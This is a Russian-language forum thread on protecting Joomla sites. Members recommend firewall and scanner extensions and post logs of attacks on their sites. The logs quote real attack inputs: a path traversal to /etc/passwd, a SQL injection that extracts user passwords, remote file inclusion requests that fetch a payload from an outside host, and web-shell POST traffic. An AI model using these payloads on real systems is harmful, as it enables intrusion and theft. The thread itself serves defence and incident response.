Компоненты и скрипты для защиты сайта. Логи атак на сайты

  • 589 Ответов
  • 190022 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com
========================================================
От модератора:

1. Логи выкладывайте строго под спойлер!

2. Запрещено цитировать сообщения целиком. Цитируя, апеллируйте к конкретной фразе.


========================================================

Обновлено 01.10.2014 - обновлены скрипты и некоторая информация.

Здесь я собрал ссылки на понравившиеся мне расширения по защите сайтов. Это мало касается правильной защиты сервера, на котором расположены сайты. Необходимо следить за тем, чтобы программное обеспечение сервера было актуальным, без уязвимостей и правильно настроенным. В любом случае на шаред хостингах за вас это должен делать хостер. На своем сервере без "расширенного администрирования" вы сами отвечаете за безопасность.

Вы можете обратиться ко мне для лечения вашего сайта, если у вас есть в этом необходимость.

Контакты:
Спойлер
[свернуть]

Еще сюда вы можете выложить лог атаки на ваш сайт или что либо еще, что может быть полезным для сообщества.

Ниже представлена информация по теме:

Securitycheck - Бесплатный firewall который пишет логи + возможность проверки расширений Joomla на уязвимость. Мне понравился. Устанавливаем и он уже готов к работе.

Еще есть 2 плагина которые защищают от некоторых типов попыток взлома Joomla. Так же они пишут логи. Теоретически они способны предотвратить неизвестную атаку (Так же создать кучу проблем с работой компонентов. В таком случае их можно выключить или попробовать другой).

Marco's SQL Injection - отсылает письма с логом атаки.

и

jHackGuard -пишет лог в logs/jhackguard-log.php

jHackGuard требует регистрации для загрузки. Архивы с плагином выложил в прикрепленных файлах. Выложена версия 1.4.1. В 1.4.2 есть некоторые требования для хостинга, то есть он не везде работает корректно.

Как их настроить:

Securitycheck
Спойлер
[свернуть]
Плагин:
Спойлер
[свернуть]
Логи:
Спойлер
[свернуть]
-->
[свернуть]

Marco's SQL Injection
Спойлер
[свернуть]

jHackGuard
Спойлер
[свернуть]

Вполне возможно поможет в борьбе с уязвимостями.

Вместе вроде работают без проблем.

Также можно обратить внимание на эти расширения из раздела SITE PROTECTION каталога расширений Joomla.

Спойлер
[свернуть]

Снизу случайные примеры.

Логи доступа посложнее будет просмотреть, чем эти.

Отдельное спасибо авторам плагинов.

AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге. Действительно один из лучших из бесплатных.
Спойлер
[свернуть]
Сканер поиска Shell and BackDoor - отдельное спасибо flyingspook

Его же новый сканер, имеющий платную и бесплатную версии, но и в бесплатной уже более широкий функционал.
Спойлер
[свернуть]
Скрипт удаления вредоносного кода от icom
Спойлер
[свернуть]
AVPTool - утилита от Касперского. Хорошо ищет шеллы в бекапах и  вирусы на вашем пк.

Если вдруг вы не можете зайти на сайты антивирусов, то AVPTool скачать можно отсюда.

Дополнительные расширения для защиты сайта от спама, флуда и атак админок:

Admin Tools - имеет множество функций в том числе защита дополнительным паролем каталога администратора с помощью .htaccess
Спойлер
[свернуть]
Функция защиты админки:
Спойлер
[свернуть]
-->
[свернуть]

EasyCalcCheck PLUS - плагин предназначенный для борьбы со спамом на вашем сайте. Возможно подключать несколько типов CAPTCHA (реCAPTCHA, цифровая CAPTCHA), блокирование активности ботов по правилам пользователя, службы типа Akismet для фильтрации спама, скрытие админки и базовая защита от атак. Поддерживается интеграция со сторонними компонентами.
Спойлер
[свернуть]
Интеграция со сторонними компонентами и функции защиты:
Спойлер
[свернуть]
Антиспам:
Спойлер
[свернуть]
-->
[свернуть]

Некоторые файлы пришлось выложить на Яндекс.Диск в связи с правилами форума.

jHackGuard для версии Joomla 2.5
jHackGuard для версии Joomla 1.5
Зеркало для загрузки скрипта для поиска вредоносного кода AI-Bolit

Патч Joomla 1.5.26 [#31626] Unauthorized file upload security issue/Несанкционированная загрузка файлов. Распаковать и залить поверх обновленной Joomla 1.5.26 по ftp.

Напишите мне, если необходимо что-нибудь добавить или вы нашли ошибку.

У многих на странички с текстом вредоносного кода ругается антивирус. В этом случае можно сделать скриншот кода на этом сервисе:

Конвертер кода в изображение

Сервис годится для любых текстов. Для примера выложил отчет Marco's SQL Injection, хотя на него антивирус ругаться не будет:

Спойлер
[свернуть]

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com
Пример:

Marco's SQL Injection лог



** Local File Inclusion [GET:amp;controller] => ../../../../../../../../../../etc/passwd\0
** Local File Inclusion [REQUEST:amp;controller] => ../../../../../../../../../../etc/passwd\0

**PAGE / SERVER INFO


*REMOTE_ADDR :
94.179.198.35

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_juliaportfolio&controller=../../../../../../../../../../etc/passwd%00



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_juliaportfolio
 -[amp;controller] => ../../../../../../../../../../etc/passwd\0


*$_POST DUMP


*$_COOKIE DUMP
 -[d13f04353066f3ab4ccbafe0dc6fa697] => 72a07f922bcb46f8318026fabc3982b4
 -[__utma] => 66701246.1816384113.1325848141.1325848141.1325848141.1
 -[__utmb] => 66701246.4.10.1325848141
 -[__utmc] => 66701246
 -[__utmz] => 66701246.1325848141.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


*$_REQUEST DUMP
 -[option] => com_juliaportfolio
 -[amp;controller] => ../../../../../../../../../../etc/passwd\0
 -[d13f04353066f3ab4ccbafe0dc6fa697] => 72a07f922bcb46f8318026fabc3982b4
 -[__utma] => 66701246.1816384113.1325848141.1325848141.1325848141.1
 -[__utmb] => 66701246.4.10.1325848141
 -[__utmc] => 66701246
 -[__utmz] => 66701246.1325848141.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)





*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com
Пример:

jHackGuard

2012-01-06   11:12:51   INFO   ::1   -   Changed GET value from:     -9999 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from jos_users/* to:    -9999  SELECT 1,(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from /*


*

Langoliers

  • *****
  • 695
  • 65
  • Если б Я изучал людей, то был бы паразитологом
Спасибо! Буду пробовать настроить Marco's SQL Injection. Уже давно хотел заняться этим вопросом.
З.Ы. в заголовок темы очепятка прокралась. "выкладывать" будет правильнее :)
« Последнее редактирование: 06.01.2012, 20:43:51 от Langoliers »

*

Langoliers

  • *****
  • 695
  • 65
  • Если б Я изучал людей, то был бы паразитологом
От себя добавлю: при включении плагина Marco's SQL Injection проследите за приложениями, которые отправляют любые запросы "за пределы сайта" такие как модуль Twitter, плагин Social Share Buttons и т.п.
Если настройки плагина были по умолчанию, то подобные расширения работать не будут, нужно будет внести их в список игнорируемых.

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com
У меня все отлично в этом плане. Стоит ValAddThis plugin и все отправляется. Настроено именно так, как на картинке.

Может тему закрепить? К модераторам.

*

Langoliers

  • *****
  • 695
  • 65
  • Если б Я изучал людей, то был бы паразитологом
А у меня как раз таки ошибки посыпались с модуля твиттера и Social Share Buttons v1.3 =\

И кстати твиттер не модуль для джумлы, а подключенно в модуль HTML через API твиттера

И вот обнаружил что уже есть версия 1.4 плагина Social Share Buttons. ща поставлю и погляжу что будет
« Последнее редактирование: 06.01.2012, 23:02:14 от Langoliers »

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com

*

oriol

  • ******
  • 1053
  • 96
wishlight
А тебе этот парень с Казани часто в логах попадается ?

IP 94.180.136.142
а бот  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

*

Langoliers

  • *****
  • 695
  • 65
  • Если б Я изучал людей, то был бы паразитологом

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com

*

wayn

  • ***
  • 67
  • 0
У меня так ваще странная ситуация. Изначально была проблема с зараженными файлами типа base64_decode(. Обсуждалась здесь. Вроде скриптом ве подобрал, удалил. Жалоб нет.

На второй хостинг площадке (уже с другими сайтами) была таже проблема. Вроде тоже все вылечил. Все нормально было "пока". Вскоре обнаруживаю что аккаунт хостинка рубанули. Позвонил, сказали что от меня шлется спам. Причем ломали именно не основной домен хостинга, а дополнительный. На сайте были установлены только JoomShopping, его брал с их оффсайта. Спам слал сломанный файл конфигурации. Вот он.

Снес. Поставил все заного. Через несколько дней опять тоже самое. Еще и появились какие-то странные файлы весом 50-100 кб. Опять снес, пароли поменял. Поставил просто Joomla, взятую с Joomla.ru версия 1.5.25. Через несколько часов началось опять что-то непонятное. В папке logs появилась какая-то папка easywebsoc.td.com и кто-то реально ломится. Что делать не знаю. Заказ весит. Времени нет. Даже работать нормально не получается. Где дыра не понятно.

Логи не знаю где брать. Брал с хостинг панели. Т.е. основная атака идет именно на папку star.

Спойлер
[свернуть]

*

wayn

  • ***
  • 67
  • 0
До сих пор долбят какой-то файл anz.html в папке с компонентами. Я аж JoomShopping боюсь ставить. Подскажите как влияют на уязвимость права на папки в опциях Joomla, т.е. доступные на запись?

*

oriol

  • ******
  • 1053
  • 96
У меня это выглядит так

Спойлер
[свернуть]
-->
[свернуть]


3. закиндиваем .htacces следующего содержания
Спойлер
[свернуть]
вовсе папки откуда не должны запрашиваться файлы пользователем, пример: /administrator - /language - /libraries - /и т.д. (в приведеном выше примере 1. это прописывается но думаю лишнем не будет)

4. на файлы: configuration.php, .htaccess права 444

P.s. Есть неудобства с php.ini и configuration.php при установке расширений или изменении конфигурации для php.ini закоменнтировать: open_basedir и disable_functions и меняем права на configuration.php
Думаю лучше потратить минуту на это чем постоянно что то искать и лечить -->
[свернуть]

« Последнее редактирование: 07.02.2012, 18:16:25 от oriol »

*

wayn

  • ***
  • 67
  • 0
Тоже решил поставить на configuration.php права 444. Просто интересно откуда зараза эта лезит. Часов 5 пустая Joomla весит вроде пока ничего.

*

flyingspook

  • *****
  • 3609
  • 236

*

wayn

  • ***
  • 67
  • 0
Поставил все, подчистил снова. По совету oriol также установил Eyesite. Пока полет нормальный. Бэкапы просканировал AVPTool, вроде все чисто. Ждем.

*

goodtm

  • **
  • 13
  • 0
Привет
Вот такие запросы в своих логах обнаружил
Вроде точно такие же запросы и с 207.20.226.122, 192.167.9.177

Спойлер
[свернуть]
« Последнее редактирование: 26.02.2012, 01:44:00 от goodtm »

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com

*

Langoliers

  • *****
  • 695
  • 65
  • Если б Я изучал людей, то был бы паразитологом
Протестил Marco's SQL Injection. Провел серию атак на свой сайт. Кое что блокировал... Так скажем 50%. И прислал логи на почту. Часть не допустил htaccess, еще часть firewall на сервере. Так что в совокупности пробить не получилось... Использовал базу уязвимостей OWASP.
Так что расширение довольно полезное... И не грузит систему, как некоторые компоненты "фаерволлов"

*

Langoliers

  • *****
  • 695
  • 65
  • Если б Я изучал людей, то был бы паразитологом
Admin Tools, кто нибудь юзал? Какие функции вообще выполняет?

*

usemind

  • ***
  • 33
  • 4
Date   Time   Cause   IP   Name   User agent   Request method   Request URI   Comment
2012-03-03   14:32:10   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/AppServ-%D0%BB%D0%B5%D0%B3%D0%BA%D0%B8%D0%B9-%D1%81%D1%82%D0%B0%D1%80%D1%82-%D0%B4%D0%BB%D1%8F-web-%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA%D0%B0/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:12   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/AppServ-%D0%BB%D0%B5%D0%B3%D0%BA%D0%B8%D0%B9-%D1%81%D1%82%D0%B0%D1%80%D1%82-%D0%B4%D0%BB%D1%8F-web-%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA%D0%B0/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   
2012-03-03   14:32:16   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:18   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   
2012-03-03   14:32:22   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:24   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   

http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt

05.03.2012 17:45:28   Real-time file system protection   file   C:\Users\///\AppData\Local\Opera\Opera\cache\g_0053\opr0QX0U.tmp   PHP/IRCBot.NAA trojan   cleaned by deleting - quarantined   ////   Event occurred on a file modified by the application: C:\Program Files (x86)\Opera\opera.exe.

*

flyingspook

  • *****
  • 3609
  • 236

*

Иван

  • ***
  • 51
  • 0
Добрый день.
Обнаружил у себя недавно такое:
Код
188.165.125.51 - - [27/Feb/2012:23:50:45 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 9215 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:07 +0200] "POST /images/f.php HTTP/1.1" 200 2933 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:40 +0200] "GET /cgi-bin/test.pl HTTP/1.1" 200 133 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:48 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 6850 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:09 +0200] "POST /images/f.php HTTP/1.1" 200 2950 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:00 +0200] "GET /images/f.php HTTP/1.1" 200 4878 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:39 +0200] "GET /cgi-bin/test.pl HTTP/1.1" 301 244 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:25 +0200] "POST /images/f.php HTTP/1.1" 200 2879 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:11 +0200] "POST /images/f.php HTTP/1.1" 200 4886 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:53 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 6970 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:16 +0200] "POST /images/f.php HTTP/1.1" 200 5945 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:42 +0200] "POST /images/f.php HTTP/1.1" 200 3300 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:32 +0200] "POST /images/f.php HTTP/1.1" 200 5967 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:54 +0200] "GET /site/ HTTP/1.1" 200 5643 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/pyeytnvo94318.gif HTTP/1.1" 200 2063 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:54 +0200] "GET /site/page_files/rwlwupzl1191.css HTTP/1.1" 200 1195 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/cx4clzwzsqjs1142.gif HTTP/1.1" 200 1104 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:38 +0200] "POST /images/f.php HTTP/1.1" 200 3183 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/hsipikncqy5395.gif HTTP/1.1" 200 1936 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:46 +0200] "POST /images/f.php HTTP/1.1" 200 3364 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"

Каком образом это произошло - украли пароли?
Есть этот файл test.pl
Его выкладывать или как?

*

wishlight

  • ********
  • 3593
  • 220
  • skype aqaus.com

*

Иван

  • ***
  • 51
  • 0
« Последнее редактирование: 09.03.2012, 23:00:00 от Иван »

*

Иван

  • ***
  • 51
  • 0

*

Иван

  • ***
  • 51
  • 0
И еще нашел старый файл -includes/domit/domit.php,чисто случайно (поискал строчку из предыдущего файла (поиск-x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\)
Спойлер
[свернуть]

*

Иван

  • ***
  • 51
  • 0
Может у кого есть мнения. Откуда и как оно пролезло. Если украли пароли, то это както спокойней. А если уязвимость, то хрен я ее найду - из знаний только дедуктивный метод тыка

*

Saber

  • ***
  • 56
  • 1
У меня выделенный сервер, на нём десятка 2-3 сайтов на разных ЦМС

во всех сайты массово начали ломиться боты.
Сервер вроде настроен неплохо что потеря одного сайта не отразится на остальных, все в изолированных песочницах.



Вот к WP










к чему всё это.
до этого у меня был сервер где небыло песочниц для каждого сайта и подобрал пароль к одному сайту чуваки установили модуль.

mod_system в котором был обычный phpShell с этого шела достали все остальные сайты и где в шаблон где в сам сайт понафигачили всякой херни...

но вижу что примерно с 1-3го марта боты сильно активихированись или на нулледе или на античате видимо выложили каокй-то скрпит или что что подбирает пароли..

в общем нужен плагин или модуль что при 3х попытках выводит капчу